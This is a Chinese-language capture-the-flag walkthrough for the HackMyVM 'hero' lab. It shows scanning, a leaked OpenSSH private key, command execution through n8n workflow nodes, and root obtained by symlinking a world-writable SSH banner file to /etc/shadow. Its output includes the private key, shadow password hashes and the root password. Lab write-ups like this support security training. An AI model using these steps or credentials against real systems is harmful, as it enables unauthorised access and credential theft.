hackmyvm-hero
信息收集
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:43:9b:54 PCS Systemtechnik GmbH
192.168.56.108 08:00:27:b9:ee:14 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.277 seconds (112.43 hosts/sec). 3 responded
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# nmap -sC -sV 192.168.56.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-27 05:20 EST
Nmap scan report for 192.168.56.108
Host is up (0.00052s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
5678/tcp open rrac?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Accept-Ranges: bytes
| Cache-Control: public, max-age=86400
| Last-Modified: Thu, 27 Feb 2025 10:18:14 GMT
| ETag: W/"7b7-19546e9fd60"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 1975
| Vary: Accept-Encoding
| Date: Thu, 27 Feb 2025 10:20:31 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script type="module" crossorigin src="/assets/polyfills-DfOJfMlf.js"></script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="viewport" content="width=device-width,initial-scale=1.0" />
| <link rel="icon" href="/favicon.ico" />
| <style>@media (prefers-color-scheme: dark) { body { background-color: rgb(45, 46, 46) } }</style>
| <script type="text/javascript">
| window.BASE_PATH = '/';
| window.REST_ENDPOINT = 'rest';
| </script>
| <script src="/rest/sentry.js"></script>
| <script>!function(t,e){var o,n,
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Vary: Accept-Encoding
| Date: Thu, 27 Feb 2025 10:20:31 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
80端口的内容
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# curl http://192.168.56.108/
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
将私钥保存下来解一下里面的内容
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# ssh-keygen -y -f id_rsa
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiYY31x+ZMvvHfmGWC7ZE75BbdbAKYEtIX75k6CL27C shawa@hero
80端口给了一个私钥。但是靶机并没有开启22端口。所以我们暂时并不知道这个私钥可以用来干什么
5678端口 5678是是一个n8n的管理页面
创建一个账号进来
测试
新建一个workflow
在加入功能的板块有一个Core
里面有一个可以执行系统命令的板块
我将它与chat连接到一起,就可以在聊天框执行系统命令
但是node用户的目录下面并没有我们想要的use.txt
在/目录下发现了.dockerenv文件才得知这是一个docker环境
当我得知这个环境是一个docker的时候 我的思路已经开始偏离了
我去网上搜索各种docker逃逸的方法,其他逃离出这个环境
很遗憾我尝试的办法都失败了
后来我想起来可以在这个docker环境上面下载一个nmap来扫描一下靶机在172.17.0.1这个网络地址上面开启了什么服务
我在github上下载了nmap的源码之后尝试上传上去进行安装。但是由于种种原因未能成功安装
后来看了ll104567的视频我得到了提示 n8n上面可以添加远程ssh凭证
使用arp -a
可以找到主机的ip
就这样可以成功将靶机的凭证添加到n8n上面
但是新的问题来了。
我该如何执行命令呢?
在刚才添加模块的页面我看到有一个模块可以远程执行ssh命令
将它添加进去
如何执行命令
我们成功的看到了我们希望的user.txt
提权
然后我就试着反弹一个shell
在我使用sudo -l想要来找一些东西的时候
竟然没有sudo???
如何我又找了具有s权限的文件
$ find / -perm -u=s -type f 2>/dev/null
bin/bbsuid
$
但是没有sudo我貌似无法使用。。只能再找其他的办法
我觉得自己可能被困在了busybhox环境中
然后我就又开始寻找逃逸busybox的方法
不幸
又没找到
/etc/ssh/sshd_config中指定了Banner文件的路径Banner /opt/banner.txt
/opt $ ls -al
total 16
drw-rw-rwx 3 root root 4096 Feb 6 10:14 .
drwxr-xr-x 21 root root 4096 Feb 6 10:03 ..
-rw-rw-rw- 1 root root 16 Feb 6 10:09 banner.txt
drwx--x--x 4 root root 4096 Feb 6 10:14 containerd
这里你可以用ln -s /etc/shadow banner.txt创建一个软链接将banner.txt指向/root/shadow来读取密码
当然 你也可以直接读取/root/root.txt来获取flag
修改banner之后
再次进行ssh登录
你再这个shell中进行ssh登录密钥验证可能会无法通过
/tmp $ ssh -i id_rsa shawa@172.17.0.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Host key verification failed.
这是你需要加上-o StrictHostKeyChecking=no 禁用严格的主机密钥检查,自动接受新密钥。
$ ssh -i id_rsa -o StrictHostKeyChecking=no shawa@172.17.0.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Warning: Permanently added '172.17.0.1' (ED25519) to the list of known hosts.
#Imthepassthaty0uwant!
root:$6$WBuW3zyLro0fagui$gq9zWbt3gEpo26gkIjtgjYZqjCJtjJrJO9EHaWkglVZWwWhQiiSNmMGejRn.Q58Z9knsWP59OQqLPgt2NAWd80:20125:0:::::
bin:!::0:::::
daemon:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
games:!::0:::::
ntp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
klogd:!:20125:0:99999:7:::
chrony:!:20125:0:99999:7:::
nginx:!:20125:0:99999:7:::
shawa:$6$24FnSb8jAyKUSa4W$Z7fiPgCy1q8VTg6eF0tVe2cjlHfZEB.fswQyBWoZdY3PwV6VyckxP8OhskWf/Kgx881HhsT2uWvVPTGRpJ43T.:20125:0:99999:7:::
第一行注释就是我们想要的root用户的密码
su
Password: Imthepassthaty0uwant!
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)